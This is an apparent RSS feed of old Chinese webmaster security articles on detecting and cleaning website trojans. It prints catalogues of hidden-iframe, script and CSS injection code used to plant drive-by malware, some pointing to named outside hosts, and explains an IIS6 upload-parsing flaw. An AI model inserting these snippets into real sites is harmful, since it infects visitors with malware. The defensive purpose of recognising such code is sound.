<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[华夏商人网：站长学院 - 网站安全]]></title>
<link>http://www.shangren.net/</link>
<description><![CDATA[站长们的学习乐园：免费试用3天北京双线空间 asp空间 php空间 asp.net空间 html空间试用]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[ziboren@yahoo.cn(游云仙鹤)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>华夏商人网：站长学院</title>
	<url>http://www.shangren.net/images/logos.gif</url>
	<link>http://www.shangren.net/</link>
	<description>华夏商人网：站长学院</description>
</image>

			<item>
			<link>http://www.shangren.net/article/78.htm</link>
			<title><![CDATA[虚拟主机服务器cpu太高，很有可能中了木马，被盗链采集]]></title>
			<author>ziboren@yahoo.cn(admin)</author>
			<category><![CDATA[网站安全]]></category>
			<pubDate>Mon,18 Jan 2010 15:21:31 +0800</pubDate>
			<guid>http://www.shangren.net/default.asp?id=78</guid>
		<description><![CDATA[w3wp.exe进程连接外网的80端口？ <br/>我用兵刃打开一查，发现我的IIS应用池W3Wp.exe的1090端口竟然连接到外部的一个IP的80端口，我昏死啊，直接输入那个IP竟然是纯真IP库的网站，<br/><br/>解决办法：<br/>一些基本的系统命令往往可以在保护网络安全上起到很大的作用，下面几条命令的作用就非常突出。 <br/><br/>首先进入dos命令行，方法:点击菜单开始-运行-输入CMD回车。 <br/><br/>检测网络连接 netstat <br/><br/>如果你怀疑自己的计算机上被别人安装了木马，或者是中了病毒，但是手里没有完善的工具来检测是不是真有这样的事情发生，那可以使用Windows自带的网络命令来看看谁在连接你的计算机。 <br/><br/>具体的命令格式是:netstat -an这个命令能看到所有和本地计算机建立连接的IP，它包含四个部分——proto(连接方式)、local address(本地连接地址)、 foreign address(和本地建立连接的地址)、state(当前端口状态)。通过这个命令的详细信息，我们就可以完全监控计算机上的连接，从而达到控制计算机的目的。 <br/><br/>禁用不明服务 net stop server <br/><br/>很多朋友在某天系统重新启动后会发现计算机速度变慢了，不管怎么优化都慢，用杀毒软件也查不出问题，这个时候很可能是别人通过入侵你的计算机后给你开放了特别的某种服务，比如IIS信息服务等，这样你的杀毒软件是查不出来的。 <br/><br/>但是别急，可以通过“net start”来查看系统中究竟有什么服务在开启，如果发现了不是自己开放的服务，我们就可以有针对性地禁用这个服务了。方法就是直接输入“net start”来查看服务，再用“net stop server”来禁止服务。 <br/><br/>轻松检查账户 net user <br/><br/>很长一段时间，恶意的攻击者非常喜欢使用克隆账号的方法来控制你的计算机。他们采用的方法就是激活一个系统中的默认账户，但这个账户是不经常用的，然后使用工具把这个账户提升到管理员权限，从表面上看来这个账户还是和原来一样，但是这个克隆的账户却是系统中最大的安全隐患。 <br/><br/>恶意的攻击者可以通过这个账户任意地控制你的计算机。为了避免这种情况，可以用很简单的方法对账户进行检测。 <br/><br/>首先在命令行下输入net user，查看计算机上有些什么用户，然后再使用“net user+用户名”查看这个用户是属于什么权限的，一般除了Administrator是administrators组的，其他都不是!如果你发现一个系统内置的用户是属于administrators组的，那几乎肯定你被入侵了，而且别人在你的计算机上克隆了账户。快使用“net user 用户名/del”来删掉这个用户。 ]]></description>
		</item>
		
			<item>
			<link>http://www.shangren.net/article/75.htm</link>
			<title><![CDATA[网站网页挂马中毒常见木马源代码]]></title>
			<author>ziboren@yahoo.cn(admin)</author>
			<category><![CDATA[网站安全]]></category>
			<pubDate>Fri,13 Mar 2009 00:12:05 +0800</pubDate>
			<guid>http://www.shangren.net/default.asp?id=75</guid>
		<description><![CDATA[挂马代码如下 <br/>一:框架挂马 <br/><br/>&lt;iframe src=地址 width=0 height=0&gt;&lt;/iframe&gt; <br/><br/>二:js文件挂马 <br/><br/>首先将以下代码 <br/>document.write(&#34;&lt;iframe width=&#39;0&#39; height=&#39;0&#39; src=&#39;地址&#39;&gt;&lt;/iframe&gt;&#34;); <br/>保存为xxx.js， <br/>则JS挂马代码为 <br/>&lt;script language=javascript src=xxx.js&gt;&lt;/script&gt; <br/><br/>三:js变形加密 <br/><br/>&lt;SCRIPT language=&#34;JScript.Encode&#34; src=http://www.xxx.com/muma.txt&gt;&lt;/script&gt; <br/>muma.txt可改成任意后缀 <br/>四:body挂马 <br/><br/>&lt;body onload=&#34;window.location=&#39;地址&#39;;&#34;&gt;&lt;/body&gt; <br/><br/>五:隐蔽挂马 <br/><br/>top.document.body.innerHTML = top.document.body.innerHTML + &#39;\r\n&lt;iframe src=&#34;<a href="http://www.caminix.cn" target="_blank" rel="external">http://www.caminix.cn</a>&#34;&gt;&lt;/iframe&gt;&#39;; <br/><br/>六:css中挂马 <br/><br/>body { <br/>background-image: url(&#39;javascript:document.write(&#34;&lt;script src=http://www.caminix.cn&gt;&lt;/script&gt;&#34;)&#39;)} <br/><br/>七:JAJA挂马 <br/><br/>&lt;SCRIPT language=javascript&gt; <br/>window.open (&#34;<a href="http://www.caminix.cn" target="_blank" rel="external">http://www.caminix.cn</a>&#34;,&#34;&#34;,&#34;toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1&#34;); <br/>&lt;/script&gt; <br/><br/>八:图片伪装 <br/><br/>&lt;html&gt; <br/>&lt;iframe src=&#34;网马地址&#34; height=0 width=0&gt;&lt;/iframe&gt; <br/>&lt;img src=&#34;图片地址&#34;&gt;&lt;/center&gt; <br/>&lt;/html&gt; <br/><br/>九:伪装调用： <br/><br/>&lt;frameset rows=&#34;444,0&#34; cols=&#34;*&#34;&gt; <br/>&lt;frame src=&#34;打开网页&#34; framborder=&#34;no&#34; scrolling=&#34;auto&#34; noresize marginwidth=&#34;0&#34;margingheight=&#34;0&#34;&gt; <br/>&lt;frame src=&#34;网马地址&#34; frameborder=&#34;no&#34; scrolling=&#34;no&#34; noresize marginwidth=&#34;0&#34;margingheight=&#34;0&#34;&gt; <br/>&lt;/frameset&gt; <br/><br/>十:高级欺骗 <br/><br/>&lt;a href=&#34;<a href="http://www.163.com" target="_blank" rel="external">http://www.163.com</a>&#34; onMouseOver=&#34;www_163_com(); return true;&#34;&gt;&lt;/a&gt; <br/>&lt;SCRIPT Language=&#34;JavaScript&#34;&gt; <br/>function www_163_com () <br/>{ <br/>var url=&#34;<a href="http://www.caminix.cn" target="_blank" rel="external">http://www.caminix.cn</a>&#34;; <br/>open(url,&#34;NewWindow&#34;,&#34;toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10&#34;); <br/>} <br/>&lt;/SCRIPT&gt; ]]></description>
		</item>
		
			<item>
			<link>http://www.shangren.net/article/44.htm</link>
			<title><![CDATA[怎样查找网页木马js.users.51.la脚本？怎样自动清除51.la木马病毒]]></title>
			<author>ziboren@yahoo.cn(admin)</author>
			<category><![CDATA[网站安全]]></category>
			<pubDate>Thu,09 Oct 2008 14:54:31 +0800</pubDate>
			<guid>http://www.shangren.net/default.asp?id=44</guid>
		<description><![CDATA[2008年10月9号，华夏商人网全国独家推出：<br/>自动查找、自动清除网页51.la木马病毒及其他常见网页木马方法：<br/>针对网站被植入js.users.51.la脚本的处理方法：下载virus.asp 文件，上传到你的网站空间的wwwroot根目录下，然后运行网址：&nbsp;&nbsp;<a href="http://." target="_blank" rel="external">http://.</a>**.**/virus.asp&nbsp;&nbsp; 即可。<br/><br/>virus.asp下载：&nbsp;&nbsp;<a href="http://www.0533.tv/virus.rar" target="_blank" rel="external">http://www.0533.tv/virus.rar</a><br/><br/>注意：下载解压后，上传到你的网站空间。<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.shangren.net/article/43.htm</link>
			<title><![CDATA[51.la木马病毒让网页中马怎么清除？51.la木马代码]]></title>
			<author>ziboren@yahoo.cn(admin)</author>
			<category><![CDATA[网站安全]]></category>
			<pubDate>Thu,09 Oct 2008 11:14:59 +0800</pubDate>
			<guid>http://www.shangren.net/default.asp?id=43</guid>
		<description><![CDATA[网站中木马病毒症状：<br/>如果你的网站一打开就显示一个程序正在安装到你的电脑上，并且网页上显示51.la的小标志，可以肯定地说，你的网页中了51.la木马，这个51.la病毒很难缠，不管静态页面，还是动态页面都能中招，并且每个页面都有，如图所示：<br/><br/><img src="http://www.shangren.net/attachments/month_0810/1200810914942.gif" border="0" alt=""/><br/><br/>那怎么删除51.la木马？<br/>用一般的卡巴、瑞星、江民、360安全卫士都找不到、也杀不死，因为他不是.exe木马，而是asp代码木马，现在教你怎么删除：<strong>把网站下载后，在网页文件asp&nbsp;&nbsp;或js文件中找这段代码并删除 就可以了<br/><br/>document.writeln(&#34;&lt;iframe src=\&#39;http:\/\/www.eqw003.cn\/llsg\/44.htm\&#39; width=100 height=0 frameborder=0&gt;&lt;\/iframe&gt;&#34;);<br/>document.writeln(&#34;&lt;script language=\&#39;javascript\&#39; src=\&#39;http:\/\/js.users.51.la\/1598158.js\&#39;&gt;&lt;\/script&gt;&#34;);<br/>document.writeln(&#34;&lt;script language=\&#39;javascript\&#39; src=\&#39;http:\/\/www.eqw003.cn\/llsg\/44.htm\&#39;&gt; &lt;\/script&gt;&#34;);</strong><br/>注意网站程序打补丁，传说：51.la计数器已经成了网页木马传播平台，请大家注意。]]></description>
		</item>
		
			<item>
			<link>http://www.shangren.net/article/42.htm</link>
			<title><![CDATA[防范ASP木马的10基本原则，确保网站安全！]]></title>
			<author>ziboren@yahoo.cn(admin)</author>
			<category><![CDATA[网站安全]]></category>
			<pubDate>Thu,09 Oct 2008 10:45:24 +0800</pubDate>
			<guid>http://www.shangren.net/default.asp?id=42</guid>
		<description><![CDATA[ <br/>　　由于ASP它本身是服务器提供的一贡服务功能，特别是最近由dvbbs的upfile文件出现漏洞以来，其高度的隐蔽性和难查杀性，对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除，为网管人员提出了更高的技术要求. <br/>　　几个大的程序全部被发现存在上传漏洞，小程序更是不计其数，让asp木马一下占据了主流，得到广泛的使用，想必如果你是做服务器的话，一定为此头疼不止吧，特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历，事后除了对这种行径深恶痛绝外，许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是利用asp木马完成的，特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马! <br/>　　我们首先来说一下怎么样防范好了，说到防范我们自然要对asp木马的原理了，大道理我也不讲了，网上的文章有的是，简单的说asp木马其实就是用asp编写的网站程序，甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手，等等<br/>　　它和其他asp程序没有本质区别，只要是能运行asp的空间就能运行它，这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间，并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限，要想禁止asp木马运行就等于禁止asp的运行，显然这是行不通的，这也是为什么asp木马猖獗的原因!有人要问了，是不是就没有办法了呢，不，有办法的： <br/>　　第一：从源头入手，入侵者是怎么样上传asp木马的呢？一般哟几种方法，通过sql注射手段，获取管理员权限，通过备份数据库的功能将asp木马写入服务器。或者进入后台通过asp程序的上传功能的漏洞，上传木马等等，当然正常情况下，这些可以上传文件的asp程序都是有权限限制的，大多也限制了asp文件的上传。(比如：可以上传图片的新闻发布、图片管理程序，及可以上传更多类型文件的论坛程序等)，如果我们直接上传asp木马的话，我们会发现，程序会有提示，是不能直接上传的，但由于存在人为的asp设置错误及asp程序本身的漏洞，给了入侵者可乘之机，实现上传asp木马。 <br/>　　因此，防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上，如果你是用别人的程序的话，尽量用出名一点的大型一点的程序，这样漏洞自然就少一些，而且尽量使用最新的版本，并且要经常去官方网站查看新版本或者是最新补丁，还有就是那些数据库默认路径呀，管理员密码默认呀，一定要改，形成习惯保证程序的安全性。 <br/>　　那么如果你是程序员的话，我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端，尽量少的在ASP文件里出现，涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意<br/>　　上面的只是对客户的一些要求，但是空间商由于无法预见虚拟主机用户会在自己站点中上传什么样的程序，以及每个程序是否存在漏洞，因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。这也更加说明要防范asp木马，虚拟主机用户就要对自己的程序严格把关! 为此我总结了ASP木马防范的十大原则供大家参考：<br/>　　1、建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。<br/>　　2、对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。<br/>　　这其中包括各种新闻发布、商城及论坛程序，只要可以上传文件的asp都要进行身份认证!<br/>　　3、asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。<br/>　　4、到正规网站下载asp程序，下载后要对其数据库名称和存放路径进行修改，数据库文件名称也要有一定复杂性。 <br/>　　5、要尽量保持程序是最新版本。<br/>　　6、不要在网页上加注后台管理程序登陆页面的链接。<br/>　　7、为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过ftp上传即可。<br/>　　8、要时常备份数据库等重要文件。<br/>　　9、日常要多维护，并注意空间中是否有来历不明的asp文件。记住：一分汗水，换一分安全!<br/>　　10、一旦发现被入侵，除非自己能识别出所有木马文件，否则要删除所有文件。<br/>　　重新上传文件前，所有asp程序用户名和密码都要重置，并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。<br/>　　做好以上防范措施，您的网站只能说是相对安全了，决不能因此疏忽大意，因为入侵与反入侵是一场永恒的战争<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.shangren.net/article/41.htm</link>
			<title><![CDATA[如何防止网站被挂马？中马网页文件有什么特点？]]></title>
			<author>ziboren@yahoo.cn(admin)</author>
			<category><![CDATA[网站安全]]></category>
			<pubDate>Thu,09 Oct 2008 10:42:58 +0800</pubDate>
			<guid>http://www.shangren.net/default.asp?id=41</guid>
		<description><![CDATA[ <br/>A。为什么好好的网站会有木马？<br/>一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严，程序上有上传功能，没有进行文件目录和文件后缀等的判断，一般这类的目录，以“海阳顶端网ASP木马”较为流行。<br/>因2003平台IIS6原因，也存在目录名问题引起ASP木马。( 微软的IIS 6存在严重解析文件名错误<br/>测试办法：在FTP中建立一个 test.asp 的文件夹，文件夹名就是 test.asp ，在这个文件夹中上传一个 hack.jpg，这个jpg的内容可以直接是，然后，用IE远程访问这个hack.jpg，你可以发现，它一样被当作是ASP文件来运行！显然，只要你的网站程序，允许用户自己建立文件夹及上传图片，黑客就可以上传图片来当作ASP木马来运行。<br/>解决办法：所有使用星外虚拟主机管理平台的虚拟主机用户，可以在主机面板，设置执行权限选项中，直接将有上传权限的目录，取消ASP的运行权限，就可以解决这个问题。<br/>可以参考其他公司的同类公告：<br/><a href="http://www.powereasy.net/Announce/3004.html" target="_blank" rel="external">http://www.powereasy.net/Announce/3004.html</a>(动易)<br/>)<br/>大家常用的动易2006和动网，BLOG这类的程序，需要详细的检查一下，并跟着开发者进行相应的安全程序升级。这样才能减少因代码原因引起的网站被黑。<br/>B。网站被黑了，如何检查是那些网页有问题呢。<br/>目前流行的网站被黑，是在相应的asp,htm,js等文件中，插入&lt;iframe src=http://<br/>这样的，需要使用查找程序来查找这类文件出来，手工删除此类插入的HTML代码。这项工作相对比较繁锁。需要仔细的查找。也会有一些木马是插入到js中，是以js调用方式的。更详细的资料，请看后部分E.挂马代码大全。<br/>C。禁止写入和目录禁止执行的功能，二项功能组合，可以有效的防止ASP木马。这对于常被ASP木马影响的网站来说，会有一些帮助。<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.shangren.net/article/40.htm</link>
			<title><![CDATA[怎样网站网页挂马代码、asp木马大全 ]]></title>
			<author>ziboren@yahoo.cn(admin)</author>
			<category><![CDATA[网站安全]]></category>
			<pubDate>Thu,09 Oct 2008 10:39:59 +0800</pubDate>
			<guid>http://www.shangren.net/default.asp?id=40</guid>
		<description><![CDATA[检查网页文件是否被挂马的时候可以参考如下！<br/>一:框架挂马 <br/>&lt;iframe src=地址 width=0 height=0&gt;&lt;/iframe&gt; <br/>二:js文件挂马 <br/>首先将以下代码 <br/>document.write(&#34;&lt;iframe width=&#39;0&#39; height=&#39;0&#39; src=&#39;地址&#39;&gt;&lt;/iframe&gt;&#34;); <br/>保存为xxx.js， <br/>则JS挂马代码为 <br/>&lt;script language=javascript src=xxx.js&gt;&lt;/script&gt; <br/>三:js变形加密 <br/>&lt;SCRIPT language=&#34;JScript.Encode&#34; src=http://www.xxx.com/muma.txt&gt;&lt;/script&gt; <br/>muma.txt可改成任意后缀 <br/>四:body挂马 <br/>&lt;body &gt;&lt;/body&gt; <br/>五:隐蔽挂马 <br/>top.document.body.innerHTML = top.document.body.innerHTML + &#39;\r\n&lt;iframe src=&#34;<a href="http://www.xxx.com/muma.htm/" target="_blank" rel="external">http://www.xxx.com/muma.htm/</a>&#34;&gt;&lt;/iframe&gt;&#39;; <br/>六:css中挂马 <br/>body { <br/>background-image: url(&#39;javascript:document.write(&#34;&lt;script src=http://www.XXX.net/muma.js&gt;&lt;/script&gt;&#34;)&#39;)} <br/>七:JAJA挂马 <br/>&lt;SCRIPT language=javascript&gt; <br/>window.open (&#34;地址&#34;,&#34;&#34;,&#34;toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1&#34;); <br/>&lt;/script&gt; <br/>八:图片伪装 <br/>&lt;html&gt; <br/>&lt;iframe src=&#34;网马地址&#34; height=0 width=0&gt;&lt;/iframe&gt; <br/>&lt;img src=&#34;图片地址&#34;&gt;&lt;/center&gt; <br/>&lt;/html&gt; <br/>九:伪装调用： <br/>&lt;frameset rows=&#34;444,0&#34; cols=&#34;*&#34;&gt; <br/>&lt;frame src=&#34;打开网页&#34; framborder=&#34;no&#34; scrolling=&#34;auto&#34; noresize marginwidth=&#34;0&#34;margingheight=&#34;0&#34;&gt; <br/>&lt;frame src=&#34;网马地址&#34; frameborder=&#34;no&#34; scrolling=&#34;no&#34; noresize marginwidth=&#34;0&#34;margingheight=&#34;0&#34;&gt; <br/>&lt;/frameset&gt; <br/>十:高级欺骗 <br/>&lt;a href=&#34;<a href="http://www.163.com" target="_blank" rel="external">http://www.163.com</a>(迷惑连接地址，显示这个地址指向木马地址)&#34; &gt; 页面要显示的内容 &lt;/a&gt; <br/>&lt;SCRIPT Language=&#34;JavaScript&#34;&gt; <br/>function www_163_com () <br/>{ <br/>var url=&#34;网马地址&#34;; <br/>open(url,&#34;NewWindow&#34;,&#34;toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10&#34;); <br/>} <br/>&lt;/SCRIPT&gt;]]></description>
		</item>
		
</channel>
</rss>
